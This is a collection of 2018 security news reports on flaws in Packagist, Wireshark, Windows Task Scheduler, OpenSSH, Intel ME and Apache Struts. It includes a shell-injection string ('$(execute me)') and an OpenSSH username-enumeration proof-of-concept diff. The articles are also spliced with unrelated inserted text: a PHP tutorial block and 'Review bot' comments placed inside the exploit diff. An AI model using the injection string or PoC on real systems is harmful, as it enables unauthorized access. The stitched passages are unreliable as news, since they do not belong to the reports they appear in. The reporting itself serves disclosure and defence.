“You could type $(execute me) into a big text field on the site and it would execute your command in a shell (twice).” reads the security advisory published by the expert.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,”


The expert pointed out that when a user provided a URL, Packagist was improperly escaping the input, allowing an attacker to execute arbitrary commands in a shell (twice).

The mitigation was simple: the maintainers of the Packagist repository implemented escaping for the relevant parameters in the Composer repository.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” explained Justicz.

The expert warned that the low level of security implemented by package managers could open the door to future attacks.

“Package manager security is not always great, and you should probably plan on your package manager servers being compromised in the future. In the past year or so I have found bugs that let me execute arbitrary code on rubygems.org, execute code on some of npm’s official mirrors (not the main registry), delete arbitrary release files from PyPI, serve arbitrary JS on every site using a popular CDN for npm, and now execute arbitrary code on packagist.org.” concludes the expert.

“I think it is a security anti-pattern to have application build pipelines pull fresh downloads of packages from upstream servers on every build if the packages are not expected to change. If for some reason you have to do this, you should pin dependencies using a cryptographically secure hash function.”


Wireshark fixed three flaws that can crash it via malicious packet trace files
4.9.2018 securityaffairs
Vulnerebility

The Wireshark team has addressed three serious vulnerabilities that could be exploited by a remote unauthenticated attacker to crash the analyzer.
The Wireshark development team has fixed three serious flaws that could be exploited by a remote unauthenticated attacker to trigger a DoS condition in the world’s most popular network protocol analyzer.

The three vulnerabilities tracked as CVE-2018-16056, CVE-2018-16057 and CVE-2018-16058 affect respectively the Bluetooth Attribute Protocol (ATT) dissector, the Radiotap dissector, and the Audio/Video Distribution Transport Protocol (AVDTP) dissector components of Wireshark.

A proof-of-concept (PoC) exploit for each flaw is publicly available, and the vulnerabilities are trivial to exploit: an attacker can trigger them by injecting a malformed packet into a network that Wireshark is parsing, or by tricking the victim into opening a malicious packet trace file.

“To exploit the vulnerability, the attacker may use misleading language and instructions to convince a user to open a malicious packet trace file.” reads the security advisory published for the CVE-2018-16057 flaw.

“To inject malformed packets that the Wireshark application may attempt to parse, the attacker may need access to the trusted, internal network where the targeted system resides. This access requirement may reduce the likelihood of a successful exploit.”

In any case, triggering the flaw requires the victim to open a malicious packet trace file, a circumstance that makes the likelihood of exploitation very low.


Wireshark users need to upgrade their install to one of these: 2.6.3, 2.4.9, or 2.2.17.

Below is the list of safeguards provided by Cisco in its security advisory:

Administrators are advised to apply the appropriate updates.
Administrators are advised to allow only trusted users to have network access.
Administrators are advised to run both firewall and antivirus applications to minimize the potential of inbound and outbound threats.
Administrators may consider using IP-based access control lists (ACLs) to allow only trusted systems to access the affected systems.
Administrators can help protect affected systems from external attacks by using a solid firewall strategy.
Administrators are advised to monitor affected systems.


Third-Party researchers released micropatch for recently disclosed Windows Zero-Day
2.9.2018 securityaffairs
Vulnerebility

Security researchers from the 0patch community released a micropatch for the recently disclosed Windows zero-day vulnerability.
A few days ago, the security researcher who handles the Twitter account @SandboxEscaper disclosed the details of a zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

Microsoft is expected to address the vulnerability in the September Patch Tuesday, scheduled for September 11; in the meantime a patch was released by 0patch, a community of experts that aims at addressing software flaws.

The community is known for developing tiny patches, usually less than 30 bytes in size, and it released a fix within 24 hours after the public disclosure of the issue.

The fix for the Windows zero-day recently disclosed is only 13 bytes in size.

Experts explained that they have validated and verified the micropatch for @SandboxEscaper’s LPE in Task Scheduler.

It currently works only on fully updated 64-bit Windows 10 1803.

0patch
@0patch
· Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED. pic.twitter.com/3kHcXdY42H


0patch
@0patch
Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at support@0patch.com. pic.twitter.com/9pNufwUehU

2:19 PM - Aug 30, 2018

“As the researcher’s POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” reads the analysis published by 0patch.

“SandboxEscaper’s documentation properly identifies the problem being in Task Scheduler’s SchRpcSetSecurity method, which is externally accessible via Advanced Local Procedure Call (ALPC) facility.”

This is just a temporary fix; Windows users are advised to apply the official Microsoft update as soon as it becomes available.

0patch warns of unexpected errors that could be caused by the unofficial fix they released.

“Can we keep using this micropatch instead of applying Microsoft’s update?

We strongly recommend against that. Microsoft’s update will not only fix this issue in a more informed way, but will also bring fixes for other vulnerabilities that we don’t have micropatches for. Yes, we hate losing hours of our lives to updating our systems too, but wouldn’t dream of outright replacing official updates with our micropatches 😉 ” concludes 0patch.


Third-Party Patch Released for Windows Zero-Day
31.8.2018 securityweek 
Vulnerebility

A patch is available for a Windows zero-day that became public knowledge earlier this week, but it’s not from Microsoft.

Instead, the fix comes from 0patch, a community project that aims at addressing software vulnerabilities by delivering tiny fixes to users worldwide. The patches are indeed tiny, usually less than 30 bytes in size.

The fix for this week’s vulnerability is also very small, at only 13 bytes. It was released within 24 hours after the bug was disclosed on Twitter on Monday, and, already validated and verified, it is now rolling out to users.


@0patch
· Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED. pic.twitter.com/3kHcXdY42H


0patch
@0patch
Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at support@0patch.com. pic.twitter.com/9pNufwUehU

2:19 PM - Aug 30, 2018

The vulnerability was discovered in the Windows Task Scheduler’s Advanced Local Procedure Call (ALPC) interface and was confirmed to impact at least Windows 10 64-bit machines. CERT/CC issued an alert soon after details on the bug were posted online along with proof-of-concept (PoC) code.

“As the researcher's POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” 0patch points out in a blog post.

The issue resides in Task Scheduler's SchRpcSetSecurity method, which is externally accessible via ALPC. The method can be called by any local process and sets a desired security descriptor (sddl) on a task or folder.

Because the method “fails to impersonate the requesting client when setting the security descriptor,” Task Scheduler changes the access control list of the chosen file or folder as Local System user for all users, even low-privileged ones.

While the micropatch fully addresses the issue, preventing even variations of the exploit from triggering the vulnerability, users are advised to apply a Microsoft-supplied fix as soon as one becomes available. The unofficial fix might also cause unexpected errors, 0patch warns.

Microsoft’s next set of patches is expected to arrive on September 11 and an official fix for this 0-day is highly likely to be delivered then.


Critical Vulnerability Patched in PHP Package Repository
31.8.2018 securityweek 
Vulnerebility

A critical remote code execution vulnerability was recently addressed in packagist.org, a large PHP package repository, a security researcher reveals.

An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The packagist.org site helps users search for packages and lets Composer know where to get the code from.

Statistics on the website show that Packagist has delivered billions of packages since its inception in 2012, and that it is currently serving around 400 million package installs per month.

What security researcher Max Justicz discovered was that there was a “big text field on the site” that allowed anyone to type $(execute me), which would result in the command being executed in a shell.

The issue, Justicz says, resided in the package repository’s functionality that allows users to upload packages.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,” the researcher notes.

However, when checking the provided URL, Packagist was improperly escaping input. Any commands an attacker would have provided were executed twice.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” Justicz reveals.
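This write-up and the securityaffairs piece earlier on the page describe the same mechanism: the repository URL is passed, unescaped, as an argument to git, p4, svn or hg, so a $(…) substitution inside it is expanded by the shell before the VCS tool runs. The following is an added example, not Packagist or Composer code, that models the vulnerable and the escaped form of that shell-out in PHP; the function names, the allow-list pattern and the sample URL are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not Packagist/Composer code. It models the repository-type probe
// described in the article: a user-supplied URL ends up as an argument to a shell
// command such as `git ls-remote <url>`. Only the command strings are built here;
// nothing is executed.

// Constructed input, modelled on the "$(execute me)" string from the write-up.
// In the vulnerable form /bin/sh expands the $( ... ) part before git ever runs.
const SAMPLE_URL = 'https://example.invalid/repo.git$(execute me)';

/** Vulnerable form: raw string interpolation, the class of bug that was reported. */
function buildProbeCommandVulnerable(string $url): string
{
    return 'git ls-remote ' . $url;
}

/** Fixed form: escapeshellarg() single-quotes the value, so $( ), backticks,
 *  ;, | and && reach git as literal characters instead of shell syntax. */
function buildProbeCommandSafe(string $url): string
{
    return 'git ls-remote ' . escapeshellarg($url);
}

/** Defence in depth (hypothetical allow-list, not part of the actual fix): refuse
 *  anything that does not look like a VCS URL before shelling out at all. */
function isPlausibleRepoUrl(string $url): bool
{
    return (bool) preg_match(
        '#^(https?|git|ssh|svn|svn\+ssh|hg|p4)://[A-Za-z0-9._~:/@+-]+$#',
        $url
    );
}

/** Avoiding the shell entirely is better still: from PHP 7.4 proc_open() accepts
 *  the command as an array and executes the program directly with this argv. */
function buildProbeArgv(string $url): array
{
    return ['git', 'ls-remote', $url];
}

printf("vulnerable: %s\n", buildProbeCommandVulnerable(SAMPLE_URL));
printf("safe:       %s\n", buildProbeCommandSafe(SAMPLE_URL));
var_dump(isPlausibleRepoUrl(SAMPLE_URL));
var_dump(isPlausibleRepoUrl('https://github.com/composer/composer.git'));
var_dump(buildProbeArgv(SAMPLE_URL));
```

Comparing the two printed command strings shows what /bin/sh would receive in each case; the allow-list rejects the constructed URL outright, and the argv form never involves a shell.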

The security researcher, who over the past year discovered multiple issues on popular repositories, warns of the high probability that package manager servers could be compromised in the future.

“The flaw could have been easily avoided by setting parameters on what users can input into text boxes. Without parameters, text boxes become entry points for bad actors to execute malicious commands in order to access the server and, once there, potentially gain access to credentials that will let them hop from one server to another while harvesting sensitive information,” Mike Bittner, Digital Threat Analyst for The Media Trust, told SecurityWeek in an emailed comment.

“Developers should make security a priority all throughout a product's lifecycle stages, from concept to manufacturing to retirement. Website operators should police all their website third-party code providers to ensure their activities align with policies, and scan their sites to identify and obstruct unauthorized code,” Bittner concluded.


CVE-2018-15919 username enumeration flaw affects OpenSSH Versions Since 2011
30.8.2018 securityaffairs
Vulnerebility

Qualys experts discovered that OpenSSH is still vulnerable to an oracle attack: it is affected by the CVE-2018-15919 flaw at least since September 2011.
Security experts from Qualys discovered that OpenSSH is still vulnerable to an oracle attack: it is affected by the CVE-2018-15919 flaw at least since September 2011.

A few days ago the security expert Darek Tytko from securitum.pl reported a similar username enumeration vulnerability in the OpenSSH client. The flaw, tracked as CVE-2018-15473, affects all versions of the software released since 1999. The vulnerability could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

Researchers from Qualys discovered that another username enumeration vulnerability affects the latest version of OpenSSH, the issue was tracked as CVE-2018-15919.

Qualys researchers discovered the vulnerability while analyzing a commit in the OpenBSD source code.

“While properly reviewing the now-famous OpenSSH commit https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 we discovered another username-enumeration vulnerability in auth2-gss.c (enabled by default on at least Fedora, CentOS, and Red Hat Enterprise Linux).” reads the security advisory.

“This vulnerability affects OpenSSH versions from 5.9 (September 6, 2011) to the recently released 7.8 (August 24, 2018), inclusive. It is quite similar to CVE-2018-15473 (it is not a timing attack), but it is also markedly different (code excerpts from OpenSSH 7.8p1)”

The issue resides in the auth2-gss.c module that is enabled by default on many Linux distros, including CentOS, Fedora, and Red Hat Enterprise Linux.

When a user tries to authenticate, an attacker receives the same packet whether the user is valid or not as explained in the report.

“If the user is valid, then ‘server_caused_failure’ is set, ‘failures’ is not incremented, and the attacker can attempt the GSSAPI authentication indefinitely;
if the user is invalid, then ‘server_caused_failure’ is not set, ‘failures’ is incremented (at line 412), and the server will disconnect the attacker (at line 417) after max_authtries authentication attempts (6, by default).”
In other words, ‘server_caused_failure’ is set only for a valid user; for a user that does not exist the flag is never set and the failure counter grows.

Experts explained that the number of attempts for an invalid user is limited to six, while if a valid user is provided the attacker can attempt the GSSAPI authentication indefinitely.

The latter case allows the attacker to run brute-force attacks on the password.

Experts published the following proof-of-concept code for the CVE-2018-15919 flaw:

diff -pruN openssh-7.8p1/gss-genr.c openssh-7.8p1-poc/gss-genr.c
--- openssh-7.8p1/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
@@ -286,6 +286,7 @@ ssh_gssapi_check_mechanism(Gssctxt **ctx

ssh_gssapi_build_ctx(ctx);
ssh_gssapi_set_oid(*ctx, oid);
+ return 1;
major = ssh_gssapi_import_name(*ctx, host);
if (!GSS_ERROR(major)) {
major = ssh_gssapi_init_ctx(*ctx, 0, GSS_C_NO_BUFFER, &token,
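Review bot: the `+ return 1;` inserted right after ssh_gssapi_set_oid() makes the remainder of ssh_gssapi_check_mechanism() unreachable, so `major` and `token` are assigned but never evaluated and the compiler will warn about unreachable code; the function now reports every mechanism as usable without importing the host name or initialising a context, which should at least be stated in a comment on the inserted line.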
diff -pruN openssh-7.8p1/sshconnect2.c openssh-7.8p1-poc/sshconnect2.c
--- openssh-7.8p1/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
@@ -701,6 +701,7 @@ userauth_gssapi(Authctxt *authctxt)
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_TOKEN, &input_gssapi_token);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERROR, &input_gssapi_error);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERRTOK, &input_gssapi_errtok);
+ return 1;

mech++; /* Move along to next candidate */
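Review bot: with `+ return 1;` placed before `mech++`, the candidate index is never advanced, so the same mechanism is re-offered on every call and the `mech++; /* Move along to next candidate */` line becomes dead code; either drop the now-unreachable increment or comment the inserted return so the intent is clear to the next reader.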

According to the experts from Qualys, the OpenSSH maintainers do not consider the username enumeration vulnerability critical and, for this reason, have not planned a fix in the short term.

“Open-source developer Damien Miller working on OpenSSH says that system libraries do not treat this type of information disclosure as a threat because usernames are considered the non-secret part of user identity, useless to an attacker without the accompanying password.” states Bleeping Computer.

“Specific users on a system can often give away the exact operating system or distribution, as well as services that are running on the system, especially if they have default usernames for those services,” Jimmy Graham, Director of Product Management at Qualys, told BleepingComputer.


Experts published a PoC code for Intel Management Engine JTAG flaw
29.8.2018 securityaffairs
Vulnerebility

A group of security researchers has published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.
A team of security researchers has published a proof-of-concept exploit code for a vulnerability in the Intel Management Engine JTAG.

Last year the same group of experts at Positive Technologies discovered an undocumented configuration setting that disabled the Intel Management Engine.

The Intel Management Engine consists of a microcontroller that works with the Platform Controller Hub chip in conjunction with integrated peripherals; it is a critical component that handles data exchanged between the processor and peripherals.

For this reason, security experts warned in the past of the risks for Intel Management Engine vulnerabilities. An attacker can exploit a flaw in the Intel ME to establish a backdoor on the affected system and gain full control over it.

The flaw was patched, but the team composed of Mark Ermolov, Maxim Goryachy, and Dmitry Sklyarov has devised a walkthrough for accessing the Joint Test Action Group (JTAG) feature implemented in Intel’s Management Engine (IME).

The JTAG feature provides debugging access to the processor via special USB 3.0 debugging connectors.

“A special USB 3.0 debugging connector is also necessary, though those who enjoy hacking hardware can make their own by isolating the D+, D-, and Vcc contacts on a USB 3.0 Type A Male to Type A Male cable.” reported ElReg.

The PoC incorporates the work of Dmitry Sklyarov, another researcher from the company.

The exploitation of the flaw is not simple: it requires physical access to the device via USB.

In May 2017, security experts discovered a critical remote code execution (RCE) vulnerability, tracked as CVE-2017-5689, in the remote management features implemented on computers shipped with Intel chipsets in the past 9 years.

The vulnerability affected the Intel Management Engine (ME) technologies such as Active Management Technology (AMT), Small Business Technology (SBT), and Intel Standard Manageability (ISM) and could be exploited by hackers to remotely take over the vulnerable systems.

The Electronic Frontier Foundation asked Intel to provide a way to disable the IME.

In August 2017, the experts from Positive Technologies (Dmitry Sklyarov, Mark Ermolov, and Maxim Goryachy) discovered a way to disable the Intel Management Engine 11 via an undocumented mode.

The researchers discovered that it is possible to turn off the Intel ME by setting the undocumented high assurance platform (HAP) bit to 1 in a configuration file.

The experts discovered that the security framework was developed by the US National Security Agency … yes the NSA!

In November Intel issued a security patch for the JTAG vulnerability (INTEL-SA-00086) and in February 2018 it issued a new update for the fix. The vulnerability allowed an attacker to execute arbitrary and unsigned code by using the PoC code to activate JTAG for the IME core.

The PoC was working on a Gigabyte Brix GP-BPCE-3350C (an Intel Celeron-based compact PC); the experts now note that it should also work on other Intel Apollo Lake-based PCs.

The exploitation of the flaw also requires the availability of the TXE firmware version 3.0.1.1107 and a utility called Intel TXE System Tools that is available only to some of Intel’s OEM partners.


Critical Apache Struts Vulnerability Exploited in Live Attacks
29.8.2018 securityweek
Vulnerebility

A critical remote code execution vulnerability in Apache Struts 2 that was patched last week is already being abused in malicious attacks, threat intelligence firm Volexity warns.

The flaw affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Tracked as CVE-2018-11776, the bug is rather trivial to exploit: because Apache Struts doesn’t properly validate namespace input data, an attacker would only need to insert their own namespace as a parameter in an HTTP request.

Neither the Apache Software Foundation – which announced the availability of patches on August 22 – nor Semmle – the code analysis company that reported the bug in April – provided technical details, but a proof-of-concept (PoC) exploit for the vulnerability was published within days.

Now, Volexity says they have observed the first malicious campaign targeting the vulnerability. The attacks apparently started shortly after the PoC was released.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner. The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27,” the security firm reveals.

The observed exploit attempts to retrieve a copy of CNRig Miner from Github (saves it as xrig) and a shell script from BitBucket by performing wget requests to the URLs the two pieces of code reside at.

Among other actions, the shell script removes specific processes, deletes previous instances of the miner, and downloads three ELF cryptomining binaries. These are miner executables targeting Intel, ARM, and MIPS architectures, which shows the broad scope of the attack.

“[I]t shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts,” Volexity points out.

The BitBucket folder appears to be an open directory that contains both the shell script and the ELF binaries. The mining account name is the same as the BitBucket account name, the security firm says.

Apache Struts framework’s popularity makes it a highly appealing target to cybercriminals and threat actors alike, and it’s no surprise that the recently addressed bug is already being abused for malicious purposes.

A critical remote code execution flaw addressed in the framework in March 2017 was still being targeted one year later, SANS Internet Storm Center handler Guy Bruneau reported several months ago.


Critical Apache Struts flaw CVE-2018-11776 exploited in attacks in the wild
29.8.2018 securityaffairs
Vulnerebility

According to the threat intelligence firm Volexity, the CVE-2018-11776 vulnerability is already being abused in malicious attacks in the wild.
Just yesterday I wrote about the availability online of the exploit code for the recently discovered critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2.

The PoC code was published on GitHub and experts were warning of the risks of massive attacks.

The CVE-2018-11776 vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Struts versions 2.3.35 and 2.5.17 include the security updates that address CVE-2018-11776.

Struts developers also published a temporary workaround, but recommend that users do not rely on it and install the updates instead.

News of the day is that according to the threat intelligence firm Volexity, the flaw is already being abused in malicious attacks.

The vulnerability is trivial to exploit: the RCE flaw can be triggered when no namespace value is set for a result defined in the underlying XML configuration and, at the same time, the enclosing action configuration(s) have no namespace or a wildcard namespace.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

“Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit than the CVE-2017-5638 Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable applications could be impressive.

Researchers from Volexity reported having observed the first malicious campaign targeting the vulnerability just after the PoC was published online.

Threat actors are leveraging the flaw in the attempt to install the CNRig cryptocurrency miner.

“Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner.” states the report published by Volexity.

“The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27,”

The exploit used in the attacks fetches a copy of CNRig Miner from Github (saving it as xrig) and a shell script from BitBucket by performing wget requests to the URLs where the two pieces of code reside.

The shell script removes previous instances of the miner, removes specific processes, and downloads three ELF crypto mining binaries.

Below are the actions performed by the script:

Remove any processes containing the keyword rabbit.
Look for processes containing the keyword check in the name, removing it if it is not the current process.
Remove any instances of upcheck.sh or xrig.
Download three ELF cryptomining binaries, chmod them, execute the files, and then remove them.
Remove nohup.out.
Sleep for ten minutes (600 seconds).
The miners observed in this campaign target multiple architectures, including Intel, ARM, and MIPS.

“The three ELF binaries downloaded are executables for the Intel, ARM, and MIPS architectures. This is worth noting, as it shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts.” continues the report from Volexity.

The BitBucket folder involved in the attack contains both the shell script and the ELF binaries. Researchers observed that the mining account name is the same as the BitBucket account name.

I have no doubt, the number of campaigns targeting the CVE-2018-11776 vulnerability will rapidly increase. There is a large number of Apache Struts 2 installs still unpatched that are exposed online.


Expert publicly disclosed exploit code for Windows Task Scheduler Zero-Day
29.8.2018 securityaffairs
Exploit  Vulnerebility

A security researcher has publicly disclosed the details of a zero-day privilege escalation vulnerability affecting all Microsoft’s Windows operating systems.
A security researcher who handles the Twitter account @SandboxEscaper has disclosed the details of a zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

SandboxEscaper
@SandboxEscaper
Here is the alpc bug as 0day: https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar … I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit.

7:07 PM - Aug 27, 2018

According to the expert who disclosed the flaw, the issue also affects a “fully-patched 64-bit Windows 10 system.”

The vulnerability resides in the Windows’ task scheduler program and ties to errors in the handling of Advanced Local Procedure Call (ALPC) systems.

The Advanced Local Procedure Call (ALPC) is an undocumented Inter-Process Communication facility provided by the Microsoft Windows kernel for lightweight (or local) Inter-Process Communication (IPC) between processes on the same computer.

ALPC provides high-speed, secure data transfer between one or more user-mode processes.

SandboxEscaper published proof-of-concept (PoC) exploit code for the zero-day on GitHub.

The vulnerability was verified by the CERT/CC analyst Will Dormann, who posted the following message:

Will Dormann
@wdormann
I've confirmed that this works well in a fully-patched 64-bit Windows 10 system.
LPE right to SYSTEM!


12:08 AM - Aug 28, 2018

The CERT/CC published a security advisory explaining that the flaw could be exploited by a local user to obtain elevated (SYSTEM) privileges.

“Microsoft Windows task scheduler contains a vulnerability in the handling of ALPC, which can allow a local user to gain SYSTEM privileges. We have confirmed that the public exploit code works on 64-bit Windows 10 and Windows Server 2016 systems. Compatibility with other Windows versions may be possible with modification of the publicly-available exploit source code” reads the alert issued by the CERT/CC.

The flaw received a CVSS score of 6.4 to 6.8.
The CERT/CC confirmed that there is currently no workaround for the flaw. The Advanced Local Procedure Call (ALPC) interface is local to the system, which limits the impact of the vulnerability. Experts warn of malware that could include the PoC code to gain system privileges on Windows systems.

SandboxEscaper did not report the zero-day to Microsoft, so all Windows systems remain vulnerable until the company releases security updates.

At the time of writing it is still unclear whether the Windows zero-day affects all supported Windows versions; some experts, in fact, said that the PoC code doesn’t work on Windows 7.

Microsoft is expected to address the vulnerability in the September Patch Tuesday security updates, scheduled for September 11.


Exploit for Recent Critical Apache Struts Vulnerability Published
28.8.2018 securityweek
Exploit  Vulnerebility

Exploit code for a critical remote code execution vulnerability in Apache Struts 2 was published on GitHub within days of the bug being addressed last week.

Tracked as CVE-2018-11776, the security flaw was found to impact Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the popular Java framework.

In their advisory, code analysis company Semmle, which discovered the flaw and reported it to the Apache Software Foundation in April, explains that the bug affects commonly-used endpoints of Struts, which are likely to be exposed.

To make matters worse, the issue is related to the Struts OGNL (Object-Graph Navigation Language) language, which hackers are often familiar with.

To exploit the bug, attackers need to inject their own namespace as a parameter in an HTTP request. The value of that parameter, the code analysis company reveals, is insufficiently validated by the Struts framework, and can be any OGNL string.

Although only limited details on the vulnerability were made public, a working proof-of-concept (PoC) was published less than two days after the Apache Software Foundation released their advisory.

On Friday, threat intelligence provider Recorded Future revealed that, in addition to the PoC and a Python script that allows for easy exploitation of the vulnerability, they also detected “chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.”

CVE-2018-11776, Recorded Future says, is even easier to exploit compared to last year’s CVE-2017-5638, the Apache Struts exploit that was at the heart of the Equifax breach. There are hundreds of millions of potentially vulnerable systems, but identification could be challenging, as many are backend application servers.

“The new Apache Struts vulnerability is potentially even more damaging than the one from 2017 that was used to exploit Equifax. Unlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim's Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it,” Allan Liska, Senior Security Architect, Recorded Future, said in an emailed comment to SecurityWeek.

Semmle, on the other hand, won’t confirm whether the PoC is working. However, the company does warn that the published code could provide attackers with a quick way into enterprise networks.

“There is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can’t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure,” Semmle CEO, Oege de Moor, told SecurityWeek via email.

“The Equifax breach happened not because the vulnerability wasn’t fixed, but because Equifax hadn’t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn’t had the time to update their software, will now be at even greater risk,” de Moor said.


Experts warn of possible attacks after PoC code for CVE-2018-11776 Struts flaw was published
27.8.2018 securityaffairs
Vulnerebility

Exploit code for the recently discovered critical remote code execution vulnerability CVE-2018-11776 in Apache Struts 2 has been published on GitHub, and experts fear massive attacks.
The CVE-2018-11776 vulnerability affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and potentially unsupported versions of the popular Java framework.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set,” reads the security advisory published by Apache.

Experts warn that it is possible to trigger the RCE flaw when the namespace value isn’t set for a result defined in the underlying XML configuration and, at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw could also be exploited when using a url tag that doesn’t have value and action set and, at the same time, its upper action(s) configurations have no or wildcard namespace.

According to the experts from Semmle that discovered the flaw, the vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

An attacker could trigger the flaw by injecting their own namespace as a parameter in an HTTP request; the lack of proper validation of that parameter is the root of the problem.

Just two days after the Apache Software Foundation released its advisory, a working proof-of-concept (PoC) was published online.

According to the experts from the threat intelligence firm Recorded Future, there is an intense activity related to the Struts flaw in a number of Chinese and Russian underground forums.

“Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

Experts warn that the CVE-2018-11776 flaw is easier to exploit compared to the CVE-2017-5638 Apache Struts flaw that was exploited in the Equifax hack.

The number of potentially vulnerable applications could be huge.

“Apache Struts is a very popular Java framework and there are potentially hundreds of millions of vulnerable systems that could be exploited by this flaw. The challenge is in identifying how many systems are vulnerable.” continues Recorded Future.

“Because many of the servers running Apache Struts are backend application servers, they are not always easily identified, even by the system owners.”

The principal problem is that there are many reasons why Struts installations cannot be updated immediately, especially in critical systems.


Expert found a flaw that affects all OpenSSH versions since 1999
24.8.2018 securityaffairs
Vulnerebility

A security expert has discovered a username enumeration vulnerability in the OpenSSH client that affects all versions of the software released since 1999.
Security expert Darek Tytko from securitum.pl has discovered a username enumeration vulnerability in the OpenSSH client. The flaw, tracked as CVE-2018-15473, affects all versions of the software released since 1999 and could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

OpenSSH maintainers have now released a security fix, but since the OpenSSH client is included in a broad range of software applications many of them could remain vulnerable for a long time.

Researchers from Qualys published a detailed analysis of the vulnerability after they discovered that the bug had been fixed.

The flaw could potentially impact billions of devices using the vulnerable software.

Let’s see in detail how attackers can trigger the flaw.

The attacker tries to authenticate on an OpenSSH endpoint using a malformed authentication request (i.e. a truncated packet).

